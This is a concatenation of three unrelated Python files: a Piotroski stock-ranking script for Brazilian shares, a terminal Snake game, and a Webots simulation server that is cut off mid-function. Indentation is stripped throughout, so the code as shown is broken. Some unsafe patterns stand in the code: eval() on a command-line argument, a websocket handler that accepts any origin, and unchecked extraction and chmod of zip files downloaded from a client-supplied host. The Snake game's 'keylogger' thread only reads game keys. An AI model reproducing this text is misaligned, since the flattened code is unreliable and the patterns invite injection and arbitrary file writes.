def populate_shares(year):
globals()['year'] = year
globals()['infos'] = {}
if year is None:
shares = bovespa.shares()
else:
shares = fundamentus.shares(year)
shares = shares[shares['Cotação'] > 0]
shares = shares[shares['Liquidez 2 meses'] > 0]
shares['Ranking (Piotroski)'] = 0
fill_infos(shares)
shares = add_ratings(shares)
shares = reorder_columns(shares)
return shares
# infos = {
# 'TRPL4': {
# 'roa_positivo': True/False,
# 'fco_positivo': True/False,
# 'fco_saudavel': True/False,
# 'roa_crescente': True/False,
# 'alavancagem_decrescente': True/False,
# 'liquidez_crescente': True/False,
# 'no_acoes_constante': True/False,
# 'margem_bruta_crescente': True/False,
# 'giro_ativo_crescente': True/False
# }
# }
def fill_infos(shares):
cookie_jar = http.cookiejar.CookieJar()
opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cookie_jar))
opener.addheaders = [('User-agent', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201'),
('Accept', 'text/html, text/plain, text/css, text/sgml, */*;q=0.01')]
tickers = list(shares.index)
# import pry; pry()
threads = [threading.Thread(target=fill_infos_by_ticker, args=(ticker,opener,)) for ticker in tickers]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
def fill_infos_by_ticker(ticker, opener):
infos[ticker] = {
'roa_positivo': False,
'fco_positivo': False,
'fco_saudavel': False,
'roa_crescente': False,
'alavancagem_decrescente': False,
'liquidez_crescente': False,
'no_acoes_constante': False,
'margem_bruta_crescente': False,
'giro_ativo_crescente': False,
'roa_positivo_antigo': False,
'fco_positivo_antigo': False,
'fco_saudavel_antigo': False,
'roa_crescente_antigo': False,
'alavancagem_decrescente_antigo': False,
'liquidez_crescente_antigo': False,
'no_acoes_constante_antigo': False,
'margem_bruta_crescente_antigo': False,
'giro_ativo_crescente_antigo': False
}
current_year = year
# Fetching Current Year Indicators
current_indicators_url = f'https://api-analitica.sunoresearch.com.br/api/Indicator/GetIndicatorsDashboard?ticker={ticker}'
with opener.open(current_indicators_url) as link:
company_indicators = link.read().decode('ISO-8859-1')
company_indicators = json.loads(company_indicators)
# Fetching Previous Years Indicators
yearly_indicators_url = f'https://api-analitica.sunoresearch.com.br/api/Indicator/GetIndicatorsYear?ticker={ticker}'
with opener.open(yearly_indicators_url) as link:
yearly_indicators = link.read().decode('ISO-8859-1')
yearly_indicators = json.loads(yearly_indicators)
company_indicators.extend(yearly_indicators)
# Only consider company indicators before OR EQUAL to the current_year (robust solution for backtesting purposes)
company_indicators = [ci for ci in company_indicators if ci['year'] <= current_year]
# Guard each look-back so companies with fewer historical entries don't raise an IndexError.
if len(company_indicators) > 0:
infos[ticker]['roa_positivo'] = company_indicators[0]['roa'] > 0
infos[ticker]['fco_positivo'] = company_indicators[0]['fco'] > 0
infos[ticker]['fco_saudavel'] = company_indicators[0]['fco'] > company_indicators[0]['lucroLiquido']
if len(company_indicators) > 1:
infos[ticker]['roa_positivo_antigo'] = company_indicators[1]['roa'] > 0
infos[ticker]['fco_positivo_antigo'] = company_indicators[1]['fco'] > 0
infos[ticker]['fco_saudavel_antigo'] = company_indicators[1]['fco'] > company_indicators[1]['lucroLiquido']
infos[ticker]['roa_crescente'] = company_indicators[0]['roa'] > company_indicators[1]['roa']
infos[ticker]['alavancagem_decrescente'] = company_indicators[0]['dlpl'] < company_indicators[1]['dlpl']
infos[ticker]['liquidez_crescente'] = company_indicators[0]['liqCorrent'] > company_indicators[1]['liqCorrent']
infos[ticker]['no_acoes_constante'] = company_indicators[0]['qntAcoes'] == company_indicators[1]['qntAcoes']
infos[ticker]['margem_bruta_crescente'] = company_indicators[0]['margBruta'] > company_indicators[1]['margBruta']
infos[ticker]['giro_ativo_crescente'] = company_indicators[0]['giroAtivos'] > company_indicators[1]['giroAtivos']
if len(company_indicators) > 2:
infos[ticker]['roa_crescente_antigo'] = company_indicators[1]['roa'] > company_indicators[2]['roa']
infos[ticker]['alavancagem_decrescente_antigo'] = company_indicators[1]['dlpl'] < company_indicators[2]['dlpl']
infos[ticker]['liquidez_crescente_antigo'] = company_indicators[1]['liqCorrent'] > company_indicators[2]['liqCorrent']
infos[ticker]['no_acoes_constante_antigo'] = company_indicators[1]['qntAcoes'] == company_indicators[2]['qntAcoes']
infos[ticker]['margem_bruta_crescente_antigo'] = company_indicators[1]['margBruta'] > company_indicators[2]['margBruta']
infos[ticker]['giro_ativo_crescente_antigo'] = company_indicators[1]['giroAtivos'] > company_indicators[2]['giroAtivos']
def add_ratings(shares):
add_piotroski_columns(shares)
return fill_special_infos(shares)
# Initialise the score columns
def add_piotroski_columns(shares):
shares['Piotroski Score'] = 0
shares['ROA positivo'] = False
shares['FCO positivo'] = False
shares['FCO > Lucro Líquido'] = False
shares['ROA crescente'] = False
shares['Alavancagem decrescente'] = False
shares['Liquidez Corrente crescente'] = False
shares['No Ações constante'] = False
shares['Margem Bruta crescente'] = False
shares['Giro Ativo crescente'] = False
shares['ROA positivo antigo'] = False
shares['FCO positivo antigo'] = False
shares['FCO > Lucro Líquido antigo'] = False
shares['ROA crescente antigo'] = False
shares['Alavancagem decrescente antigo'] = False
shares['Liquidez Corrente crescente antigo'] = False
shares['No Ações constante antigo'] = False
shares['Margem Bruta crescente antigo'] = False
shares['Giro Ativo crescente antigo'] = False
def fill_special_infos(shares):
for index in range(len(shares)):
ticker = shares.index[index]
shares['Piotroski Score'][index] += int(infos[ticker]['roa_positivo'])
shares['ROA positivo'][index] = infos[ticker]['roa_positivo']
shares['Piotroski Score'][index] += int(infos[ticker]['fco_positivo'])
shares['FCO positivo'][index] = infos[ticker]['fco_positivo']
shares['Piotroski Score'][index] += int(infos[ticker]['fco_saudavel'])
shares['FCO > Lucro Líquido'][index] = infos[ticker]['fco_saudavel']
shares['Piotroski Score'][index] += int(infos[ticker]['roa_crescente'])
shares['ROA crescente'][index] = infos[ticker]['roa_crescente']
shares['Piotroski Score'][index] += int(infos[ticker]['alavancagem_decrescente'])
shares['Alavancagem decrescente'][index] = infos[ticker]['alavancagem_decrescente']
shares['Piotroski Score'][index] += int(infos[ticker]['liquidez_crescente'])
shares['Liquidez Corrente crescente'][index] = infos[ticker]['liquidez_crescente']
shares['Piotroski Score'][index] += int(infos[ticker]['no_acoes_constante'])
shares['No Ações constante'][index] = infos[ticker]['no_acoes_constante']
shares['Piotroski Score'][index] += int(infos[ticker]['margem_bruta_crescente'])
shares['Margem Bruta crescente'][index] = infos[ticker]['margem_bruta_crescente']
shares['Piotroski Score'][index] += int(infos[ticker]['giro_ativo_crescente'])
shares['Giro Ativo crescente'][index] = infos[ticker]['giro_ativo_crescente']
shares['Piotroski Score'][index] += int(infos[ticker]['roa_positivo_antigo'])
shares['ROA positivo antigo'][index] = infos[ticker]['roa_positivo_antigo']
shares['Piotroski Score'][index] += int(infos[ticker]['fco_positivo_antigo'])
shares['FCO positivo antigo'][index] = infos[ticker]['fco_positivo_antigo']
shares['Piotroski Score'][index] += int(infos[ticker]['fco_saudavel_antigo'])
shares['FCO > Lucro Líquido antigo'][index] = infos[ticker]['fco_saudavel_antigo']
shares['Piotroski Score'][index] += int(infos[ticker]['roa_crescente_antigo'])
shares['ROA crescente antigo'][index] = infos[ticker]['roa_crescente_antigo']
shares['Piotroski Score'][index] += int(infos[ticker]['alavancagem_decrescente_antigo'])
shares['Alavancagem decrescente antigo'][index] = infos[ticker]['alavancagem_decrescente_antigo']
shares['Piotroski Score'][index] += int(infos[ticker]['liquidez_crescente_antigo'])
shares['Liquidez Corrente crescente antigo'][index] = infos[ticker]['liquidez_crescente_antigo']
shares['Piotroski Score'][index] += int(infos[ticker]['no_acoes_constante_antigo'])
shares['No Ações constante antigo'][index] = infos[ticker]['no_acoes_constante_antigo']
shares['Piotroski Score'][index] += int(infos[ticker]['margem_bruta_crescente_antigo'])
shares['Margem Bruta crescente antigo'][index] = infos[ticker]['margem_bruta_crescente_antigo']
shares['Piotroski Score'][index] += int(infos[ticker]['giro_ativo_crescente_antigo'])
shares['Giro Ativo crescente antigo'][index] = infos[ticker]['giro_ativo_crescente_antigo']
return shares
# Reorder the table so that the Ranking, the price (Cotação) and the Piotroski Score are the first columns
def reorder_columns(shares):
columns = ['Ranking (Piotroski)', 'Cotação', 'Piotroski Score']
return shares[columns + [col for col in shares.columns if col not in tuple(columns)]]
# Get the current_year integer value, for example: 2020
def current_year():
return int(time.strftime("%Y"))
# python3 piotroski_advanced.py "{ 'year': 2015 }"
if __name__ == '__main__':
# Opening these URLs to automatically allow this API to receive more requests from local IP
browser.open('https://api-analitica.sunoresearch.com.br/api/Indicator/GetIndicatorsDashboard?ticker=BBAS3')
browser.open('https://api-analitica.sunoresearch.com.br/api/Indicator/GetIndicatorsYear?ticker=BBAS3')
year = current_year()
if len(sys.argv) > 1:
year = int(eval(sys.argv[1])['year'])
shares = populate_shares(year)
shares.sort_values(by=['Piotroski Score', 'Cotação'], ascending=[False, True], inplace=True)
shares['Ranking (Piotroski)'] = range(1, len(shares) + 1)
print(shares)
pyperclip.copy(shares.to_markdown())
if year != current_year():
backtest.run_all(fundamentus.start_date(year), list(shares.index[:20]))
|
main.py
|
'''
🐍🐍🐍 Snake: CLI ASCII Edition 🐍🐍🐍
Author: Faraz Malik
Date Created: 10/25/2018
Last Updated: 10/29/2018
'''
try: # Make sure user ran setup.bat so program will have readchar
import readchar
except:
raise Exception("Please run setup to install required modules")
import time
import threading
import random
import json
from gameComponents import *
#User configs
extremeMode = input("Enter 'yes' to play extreme mode, else enter nothing ").strip().lower() == "yes"
gameMode = "extreme" if extremeMode else "normal"
#Settings
config = {
"fps": 4,
"board": {
"width": 5 if extremeMode else 20,
"height": 5 if extremeMode else 20
}
}
#Setup keystroke detection
keystate = {
"UP": False,
"DOWN": False,
"LEFT": False,
"RIGHT": True, # Snake will initailly be going right
"ENTER": False, # Used for debugging
"STATE": "RIGHT"
}
def keydowndetect(): # Thread that updates keystate
global keystate, terminateKeylogger
keymapping = { # Maps characters entered to game keystate
"w": "UP",
"s": "DOWN",
"a": "LEFT",
"d": "RIGHT",
" ": "ENTER"
}
while not terminateKeylogger:
char = readchar.readchar().decode("utf-8")
if char in keymapping.keys():
keystate = {
"UP": False,
"DOWN": False,
"LEFT": False,
"RIGHT": False,
"ENTER": False,
"STATE": None
}
state = keymapping[char]
keystate[state] = True # Modifies keystate
if state != "ENTER":
keystate["STATE"] = state
#print("Done")
terminateKeylogger = False
keyloggerThread = threading.Thread(target=keydowndetect)
keyloggerThread.daemon = True # Make it a daemon thread
keyloggerThread.start() # Start the keylogger thread
#Initialise global components
snake = Snake(keystate["STATE"], 3, round(
config["board"]["width"]/2), round(config["board"]["height"]/2))
apple = Apple(0, 0, 0, 0).newApple(
Board(config["board"]["width"], config["board"]["height"]), snake)
score = 0
#Animation Loop
# nextFrame is whether to update all components to the next screen
def updateScreen(nextFrame=True):
global keystate, apple, config, score
# Create a new board instance; like a blank canvas
gameboard = Board(config["board"]["width"], config["board"]["height"])
if apple.eaten:
score += 1
# Apple gets reassigned to a new location
apple = apple.newApple(gameboard, snake)
apple.apply(gameboard) # Draw the apple onto the board
# Draw the snake onto the board
snake.apply(gameboard, keystate, apple, nextFrame)
print(gameboard.toString(score)) # Print out the board
updateScreen(False) # Draw the first frame
time.sleep(2) # Wait 2 seconds for game to start
while True:
try:
updateScreen() # Will throw an error if game over
except:
print('You died. Your score is %i' % score)
hs_file_r = open("hs.json", 'r') # Turns hs.json into a python dict
hs = json.loads(hs_file_r.read())
hs_file_r.close()
if (hs[gameMode]["score"] < score):
hs_file_w = open("hs.json", "w")
print("You made a highscore!")
terminateKeylogger = True # Kill the keylogger so you can type your name
# It's a little buggy, so you have to press enter a few times for the logger to terminate
input("Press enter to continue")
hs[gameMode]["name"] = input("Name: ")
hs[gameMode]["score"] = score
hs_file_w.write(json.dumps(hs, separators=(',', ':')))
hs_file_w.close()
elif hs[gameMode]["score"] == score:
print("lol just one more point and you would have the highscore.")
print("The highscore of " +
str(hs[gameMode]["score"]) + " belongs to " + hs[gameMode]["name"])
else:
print("The highscore of " +
str(hs[gameMode]["score"]) + " belongs to " + hs[gameMode]["name"])
break # Better than sys.exit() or using global variable
time.sleep(1/config["fps"]) # Wait before displaying next frame
|
simulation_server.py
|
#!/usr/bin/env python3
# Copyright 1996-2019 Cyberbotics Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Webots simulation server."""
from io import BytesIO
from pynvml import nvmlInit, nvmlShutdown, nvmlDeviceGetHandleByIndex, nvmlDeviceGetName, nvmlDeviceGetMemoryInfo, \
nvmlDeviceGetUtilizationRates
from requests import session
import asyncio
import errno
import json
import logging
import os
import platform
import psutil
import re
import shutil
import subprocess
import sys
import tempfile
import time
import threading
import tornado.ioloop
import tornado.httpserver
import tornado.web
import tornado.websocket
import traceback
import socket
import zipfile
if sys.platform == 'win32':
import wmi
SNAPSHOT_REFRESH = 1 # make a performance measurement every second
network_sent = 0
network_received = 0
def expand_path(path):
"""Expand user and environmental variables in a string."""
return os.path.expandvars(os.path.expanduser(path))
def mkdir_p(path):
"""Create a directory if it doesn't exit."""
try:
os.makedirs(path)
except OSError as exc:
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
def chmod_python_and_executable_files(directory):
"""Add executable permissions to Python and executable files."""
if sys.platform == 'win32':
return
for filename in os.listdir(directory):
fullname = os.path.join(directory, filename)
if os.path.isdir(fullname):
chmod_python_and_executable_files(fullname)
if filename.endswith('.py') or not os.path.splitext(filename)[1]:
os.chmod(fullname, 0o775)
class Snapshot:
"""This class stores instantaneous monitoring information on the machine."""
def __init__(self):
"""Create an empty instance of MonitorSnapshot."""
self.data = {'Timestamp': 0,
'Webots running': 0,
'Webots idle': 0,
'CPU load': 0,
'CPU memory': 0,
'GPU load compute': 0,
'GPU load memory': 0,
'GPU memory': 0,
'Swap': 0,
'Disk': 0,
'Network sent': 0,
'Network received': 0}
def write(self):
"""Save a snapshot into a file."""
if not config['monitorLogEnabled']:
return
global monitorFile
file = open(monitorFile, 'a')
file.write(str(self.data['Timestamp']) + ", ")
file.write(str(self.data['Webots running']) + ", ")
file.write(str(self.data['Webots idle']) + ", ")
file.write(str(self.data['CPU load']) + ", ")
file.write(str(self.data['CPU memory']) + ", ")
file.write(str(self.data['GPU load compute']) + ", ")
file.write(str(self.data['GPU load memory']) + ", ")
file.write(str(self.data['GPU memory']) + ", ")
file.write(str(self.data['Swap']) + ", ")
file.write(str(self.data['Disk']) + ", ")
file.write(str(self.data['Network sent']) + ", ")
file.write(str(self.data['Network received']) + "\n")
file.close()
class Client:
"""This class represents an instance of connected client."""
def __init__(self, client_websocket=None):
"""Create an instance of client."""
self.client_websocket = client_websocket
self.streaming_server_port = 0
self.webots_process = None
self.on_webots_quit = None
self.project_instance_path = ''
self.app = ''
self.world = ''
self.idle = True
def __del__(self):
"""Destroy an instance of client."""
if self.client_websocket:
self.client_websocket.close()
self.kill_webots()
self.cleanup_webots_instance()
def prepare_webots_instance(self):
"""Setup a local Webots project to be run by the client."""
appPath = config['projectsDir'] + '/' + self.app + '/'
self.project_instance_path = config['instancesPath'] + str(id(self))
shutil.copytree(appPath, self.project_instance_path)
hostFile = open(self.project_instance_path + "/host.txt", 'w')
hostFile.write(self.host)
hostFile.close()
if self.user1Id:
payload = {'project': self.app, 'key': self.key,
'user1Id': self.user1Id, 'user1Name': self.user1Name, 'user1Authentication': self.user1Authentication,
'user2Id': self.user2Id, 'user2Name': self.user2Name, 'customData': self.customData}
with session() as c:
response = c.post(self.host + '/ajax/download-project.php', data=payload)
if response.content.startswith(b'Error:'):
error = response.content.decode('utf-8')
if error.startswith('Error: no such directory: '):
return True # Use the default directory instead
logging.error("Failed to download project: " + error + "(host = " + self.host + ")")
return False
fp = BytesIO(response.content)
try:
zfp = zipfile.ZipFile(fp, 'r')
zfp.extractall(self.project_instance_path)
except zipfile.BadZipfile:
logging.error("Bad ZIP file:\n" + response.content.decode('utf-8'))
return False
chmod_python_and_executable_files(self.project_instance_path)
return True
def cleanup_webots_instance(self):
"""Cleanup the local Webots project not used any more by the client."""
if self.project_instance_path:
shutil.rmtree(self.project_instance_path)
def start_webots(self, on_webots_quit):
"""Start a Webots instance in a separate thread."""
def runWebotsInThread(client):
global config
world = self.project_instance_path + '/worlds/' + self.world
port = client.streaming_server_port
command = config['webots'] + ' --batch --mode=pause --minimize '
command += '--stream="port=' + str(port) + ';monitorActivity'
if self.user1Authentication or not self.user1Id: # we are running our own or an anonymous simulation
command += ';controllerEdit'
if 'multimediaServer' in config:
command += ';multimediaServer=' + config['multimediaServer']
if 'multimediaStream' in config:
command += ';multimediaStream=' + config['multimediaStream']
if config['ssl']:
command += ';ssl'
command += '" ' + world
try:
client.webots_process = subprocess.Popen(command.split(),
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
bufsize=1, universal_newlines=True)
except Exception:
logging.error('Unable to start Webots: ' + command)
return
logging.info('[%d] Webots [%d] started: "%s"' % (id(client), client.webots_process.pid, command))
while 1:
if client.webots_process is None:
# client connection closed or killed
return
line = client.webots_process.stdout.readline().rstrip()
if line.startswith('open'): # Webots world is loaded, ready to receive connections
break
hostname = client.client_websocket.request.host.split(':')[0]
if config['ssl']:
protocol = 'wss:'
else:
protocol = 'ws:'
asyncio.set_event_loop(asyncio.new_event_loop())
client.client_websocket.write_message('webots:' + protocol + '//' +
hostname + ':' + str(port))
for line in iter(client.webots_process.stdout.readline, b''):
line = line.rstrip()
if line == 'pause':
client.idle = True
elif line == 'real-time' or line == 'step':
client.idle = False
elif line == '.':
client.client_websocket.write_message('.')
client.on_exit()
if self.prepare_webots_instance():
self.on_webots_quit = on_webots_quit
threading.Thread(target=runWebotsInThread, args=(self,)).start()
else:
on_webots_quit()
def on_exit(self):
"""Callback issued when Webots quits."""
if self.webots_process:
logging.warning('[%d] Webots [%d] exited' % (id(self), self.webots_process.pid))
self.webots_process.wait()
self.webots_process = None
self.on_webots_quit()
def kill_webots(self):
"""Force the termination of Webots."""
if self.webots_process:
logging.warning('[%d] Webots [%d] was killed' % (id(self), self.webots_process.pid))
self.webots_process.terminate()
self.webots_process.wait()
self.webots_process = None
if sys.platform == 'darwin' and self.webots_process:
self.webots_process.kill()
class ClientWebSocketHandler(tornado.websocket.WebSocketHandler):
"""This class handles websocket connections."""
clients = set()
def check_origin(self, origin):
"""Allow to run the server on the same computer as the client."""
return True
@classmethod
def find_client_from_websocket(cls, client_websocket):
"""Return client associated with a websocket."""
for client in cls.clients:
if client.client_websocket == client_websocket:
return client
return None
@classmethod
def next_available_port(cls):
"""Return a port number available for a new Webots WebSocket server."""
port = config['port'] + 1
while True:
found = False
for client in cls.clients:
if port == client.streaming_server_port:
found = True
break
if found:
port += 1
else:
return port
def open(self):
"""Open a new connection for an incoming client."""
self.set_nodelay(True)
logging.info(self.request.host)
client = Client(client_websocket=self)
ClientWebSocketHandler.clients.add(client)
logging.info('[%d] New client' % (id(client),))
def on_close(self):
"""Close connection after client leaves."""
client = ClientWebSocketHandler.find_client_from_websocket(self)
if client:
logging.info('[%d] Client disconnected' % (id(client),))
client.kill_webots()
if client in ClientWebSocketHandler.clients:
ClientWebSocketHandler.clients.remove(client)
del client
def on_message(self, message):
"""Receive message from client."""
client = ClientWebSocketHandler.find_client_from_websocket(self)
if client:
data = json.loads(message)
if 'init' in data:
# setup client
client.streaming_server_port = ClientWebSocketHandler.next_available_port()
logging.info('data[init]=%s' % data['init'])
client.host = data['init'][0]
client.app = data['init'][1]
client.world = data['init'][2]
client.user1Id = data['init'][3]
client.user1Name = data['init'][4]
client.user1Authentication = data['init'][5]
client.user2Id = data['init'][6]
client.user2Name = data['init'][7]
client.customData = data['init'][8]
client.idle = True
# Check that client.host is allowed
if client.host.startswith('https://'):
host = client.host[8:]
else: # assuming 'http://'
host = client.host[7:]
n = host.find(':')
if n > 0:
host = host[:n]
keyFilename = os.path.join(config['keyDir'], host)
if (os.path.isfile(keyFilename)):
try:
keyFile = open(keyFilename, "r")
except IOError:
logging.error("Unknown host: " + host + " from " + self.request.remote_ip)
client.client_websocket.close()
return
client.key = keyFile.readline().rstrip(os.linesep)
else:
logging.warning("No key for: " + host)
logging.info('[%d] Setup client %s %s '
'(remote ip: %s, streaming_server_port: %s)'
% (id(client),
client.app,
client.world,
self.request.remote_ip,
client.streaming_server_port))
self.start_client()
elif "reset controller" in data:
relativeFilename = '/controllers/' + data['reset controller']
shutil.copyfile(config['projectsDir'] + '/' + client.app + relativeFilename,
client.project_instance_path + '/' + relativeFilename)
self.write_message('reset controller: ' + data['reset controller'])
logging.info('[%d] Reset file %s '
'(remote ip: %s, streaming_server_port: %s)'
% (id(client),
data['reset controller'],
self.request.remote_ip,
client.streaming_server_port))
def on_webots_quit(self):
"""Cleanup websocket connection."""
client = ClientWebSocketHandler.find_client_from_websocket(self)
if client and client.client_websocket:
client.client_websocket.close()
def start_client(self):
"""Start Webots."""
# let 10 seconds to start Webots
self.last_supervisor_activity = None
client = ClientWebSocketHandler.find_client_from_websocket(self)
client.start_webots(self.on_webots_quit)
class LoadHandler(tornado.web.RequestHandler):
"""Handle load requests."""
def get(self):
"""Return the current load of the simulation server."""
global current_load
self.write(str(current_load))
class MonitorHandler(tornado.web.RequestHandler):
"""Display the monitor web page."""
global config
global snapshots
global nvidia
def get(self):
"""Write the web page content."""
global cpu_load
global gpu_load_compute
global gpu_load_memory
memory = psutil.virtual_memory()
swap = psutil.swap_memory()
if nvidia:
nvmlHandle = nvmlDeviceGetHandleByIndex(0)
gpu = str(nvmlDeviceGetName(nvmlHandle))
gpu_memory = nvmlDeviceGetMemoryInfo(nvmlHandle)
gpu_ram = gpu_memory.total / (1024 * 1048576)
gpu += " - " + str(gpu_ram) + "GB"
else:
gpu = "Not recognized"
ram = str(int(round(float(memory.total) / (1024 * 1048576)))) + "GB"
ram += " (swap: " + str(int(round(float(swap.total) / (1024 * 1048576)))) + "GB)"
real_cores = psutil.cpu_count(False)
cores_ratio = psutil.cpu_count(True) / real_cores
cores = " (" + str(cores_ratio) + "x " + str(real_cores) + " cores)"
if re.search("^linux\\d?$", sys.platform): # python2: 'linux2' or 'linux3', python3: 'linux'
distribution = platform.linux_distribution()
os_name = 'Linux ' + distribution[0] + " " + distribution[1] + " " + distribution[2]
command = "cat /proc/cpuinfo"
all_info = str(subprocess.check_output(command, shell=True).strip())
for line in all_info.split("\n"):
if "model name" in line:
cpu = re.sub(".*model name.*:", "", line, 1)
break
elif sys.platform == 'win32':
computer = wmi.WMI()
os_info = computer.Win32_OperatingSystem()[0]
cpu = computer.Win32_Processor()[0].Name
os_name = os_info.Name.encode('utf-8').split('|')[0] + ", version "
os_name += os_info.Version
elif sys.platform == 'darwin':
os_name = 'macOS ' + platform.mac_ver()[0]
os.environ['PATH'] = os.environ['PATH'] + os.pathsep + '/usr/sbin'
command = 'sysctl -n machdep.cpu.brand_string'
cpu = subprocess.check_output(command).strip()
else: # unknown platform
os_name = 'Unknown'
cpu = 'Unknown'
self.write("<!DOCTYPE html>\n")
self.write("<html><head><meta charset='utf-8'/><title>Webots simulation server</title>")
self.write("<link rel='stylesheet' type='text/css' href='css/monitor.css'></head>\n")
self.write("<body><h1>Webots simulation server: " + socket.getfqdn() + "</h1>")
self.write("<h2>Host: " + os_name + "</h2>\n")
self.write("<p><b>CPU load: %g%%</b><br>\n" % cpu_load)
self.write(cpu + cores + "</p>\n")
self.write("<p><b>GPU load compute: %g%% — load memory: %g%%</b><br>\n" %
(gpu_load_compute, gpu_load_memory))
self.write(gpu + "</p>\n")
self.write("<p><b>RAM:</b><br>" + ram + "</p>\n")
self.write("<canvas id='graph' height='400' width='1024'></canvas>\n")
self.write("<script src='https://www.cyberbotics.com/harry-plotter/0.9f/harry.min.js'></script>\n")
self.write("<script>\n")
self.write("window.onload = function() {\n")
def appendData(label):
global snapshots
d = "{title:'" + label + "',values:["
for s in snapshots:
d += str(s.data[label]) + ','
return d[:-1] + "]},"
datas = ''
datas += appendData('Webots running')
datas += appendData('Webots idle')
datas += appendData('CPU load')
datas += appendData('CPU memory')
datas += appendData('GPU load compute')
datas += appendData('GPU load memory')
datas += appendData('GPU memory')
datas += appendData('Swap')
datas += appendData('Disk')
datas += appendData('Network sent')
datas += appendData('Network received')
datas = datas[:-1] # remove the last comma
self.write(" plotter({\n")
self.write(" canvas: 'graph',\n")
self.write(" datas:[ " + datas + "],\n")
self.write("""
labels:{
ypos:"left",
x:100,
y:[50,100],
marks:2
},
fill:"none",
opacity:0.5,
linewidth:3,
background:"#fff",
autoscale:"top",
grid:{
x:[0,100]
},
mouseover:{
radius:4,
linewidth:2,
bullet:"#444",
shadowbox:"1,1,0,#000",
axis:"x"
}
});""")
self.write("}\n")
self.write("</script>\n")
self.write("</body></html>")
def update_snapshot():
"""Compute a monitoring snapshot."""
global current_load
global network_sent
global network_received
global cpu_load
global gpu_load_compute
global gpu_load_memory
memory = psutil.virtual_memory()
swap = psutil.swap_memory()
disk = psutil.disk_usage('/')
n = psutil.net_io_counters()
new_network_sent = n.bytes_sent
new_network_received = n.bytes_recv
network_sent_rate = float(new_network_sent - network_sent) / (SNAPSHOT_REFRESH * 1000000) # expressed in MB/s
network_received_rate = float(new_network_received - network_received) / (SNAPSHOT_REFRESH * 1000000) # MB/s
network_sent = new_network_sent
network_received = new_network_received
global nvidia
if nvidia:
nvmlHandle = nvmlDeviceGetHandleByIndex(0)
gpu_memory = nvmlDeviceGetMemoryInfo(nvmlHandle)
gpu_ram_usage = round(100 * float(gpu_memory.used) / float(gpu_memory.total), 1)
else: # not supported
nvmlHandle = 0
gpu_ram_usage = 0
cpu_load = psutil.cpu_percent()
try:
gpu_load = nvmlDeviceGetUtilizationRates(nvmlHandle)
gpu_load_compute = gpu_load.gpu
gpu_load_memory = gpu_load.memory
except: # not supported on some hardware
gpu_load_compute = 0
gpu_load_memory = 0
webots_idle = 0
webots_running = 0
for client in ClientWebSocketHandler.clients:
if client.idle:
webots_idle = webots_idle + 1
else:
webots_running = webots_running + 1
snapshot = Snapshot()
snapshot.data['Timestamp'] = int(time.time())
snapshot.data['Webots running'] = webots_running
snapshot.data['Webots idle'] = webots_idle
snapshot.data['CPU load'] = cpu_load
snapshot.data['CPU memory'] = memory.percent
snapshot.data['GPU load compute'] = gpu_load_compute
snapshot.data['GPU load memory'] = gpu_load_memory
snapshot.data['GPU memory'] = gpu_ram_usage
snapshot.data['Swap'] = swap.percent
snapshot.data['Disk'] = disk.percent
snapshot.data['Network sent'] = network_sent_rate
snapshot.data['Network received'] = network_received_rate
snapshot.write()
current_load = 0
for key, value in snapshot.data.items():
if key == 'Timestamp':
continue
if value > current_load:
current_load = value
snapshots.append(snapshot)
if len(snapshots) > 600: # display data for the last 10 minutes
del snapshots[0]
tornado.ioloop.IOLoop.current().add_timeout(int(time.time()) + SNAPSHOT_REFRESH, update_snapshot)
def main():
"""Start the simulation server."""
# the following config variables read from the config.json file
# are described here:
#
# port: local port on which the server is listening (launching webots instances).
# sslKey: private key for a SSL enabled server.
# sslCertificate: certificate for a SSL enabled server.
# projectsDir: directory in which projects are located.
# keyDir: directory where the host keys needed for validation are stored.
# logDir: directory where the log files are written.
# monitorLogEnabled: specify if the monitor data have to be stored in a file.
#
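# A minimal illustrative config.json matching the keys described above (values are
# examples only, not defaults shipped with Webots):
# {
#     "port": 2000,
#     "projectsDir": "~/webots_projects",
#     "keyDir": "key",
#     "logDir": "log",
#     "monitorLogEnabled": true,
#     "sslKey": "/etc/ssl/private/server.key",
#     "sslCertificate": "/etc/ssl/certs/server.crt"
# }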
global config
global snapshots
global nvidia
global network_sent
global network_received
global monitorFile
n = psutil.net_io_counters()
network_sent = n.bytes_sent
network_received = n.bytes_recv
snapshots = []
config['WEBOTS_HOME'] = os.getenv('WEBOTS_HOME', '../../..').replace('\\', '/')
config['webots'] = config['WEBOTS_HOME']
if sys.platform == 'darwin':
config['webots'] += '/Contents/MacOS/webots'
elif sys.platform == 'win32':
config['webots'] += '/msys64/mingw64/bin/webots.exe'
else: # linux
config['webots'] += '/webots'
if 'projectsDir' not in config:
config['projectsDir'] = config['WEBOTS_HOME'] + '/projects/samples/robotbenchmark'
else:
config['projectsDir'] = expand_path(config['projectsDir'])
if 'keyDir' not in config:
config['keyDir'] = 'key'
else:
config['keyDir'] = expand_path(config['keyDir'])
if 'port' not in config:
config['port'] = 2000
os.environ['WEBOTS_FIREJAIL_CONTROLLERS'] = '1'
config['instancesPath'] = tempfile.gettempdir().replace('\\', '/') + '/webots/instances/'
# create the instances path
if os.path.exists(config['instancesPath']):
shutil.rmtree(config['instancesPath'])
mkdir_p(config['instancesPath'])
# logging system
log_formatter = logging.Formatter('%(asctime)-15s [%(levelname)-7s] %(message)s')
root_logger = logging.getLogger()
root_logger.setLevel(logging.DEBUG)
if 'logDir' not in config:
config['logDir'] = 'log'
else:
config['logDir'] = expand_path(config['logDir'])
simulationLogDir = os.path.join(config['logDir'], 'simulation')
logFile = os.path.join(simulationLogDir, 'output.log')
try:
if not os.path.exists(simulationLogDir):
os.makedirs(simulationLogDir)
file_handler = logging.FileHandler(logFile)
file_handler.setFormatter(log_formatter)
file_handler.setLevel(logging.INFO)
root_logger.addHandler(file_handler)
except (OSError, IOError) as e:
sys.exit("Log file '" + logFile + "' cannot be created: " + str(e))
# create monitor.csv used by Snapshot if needed
if 'monitorLogEnabled' not in config:
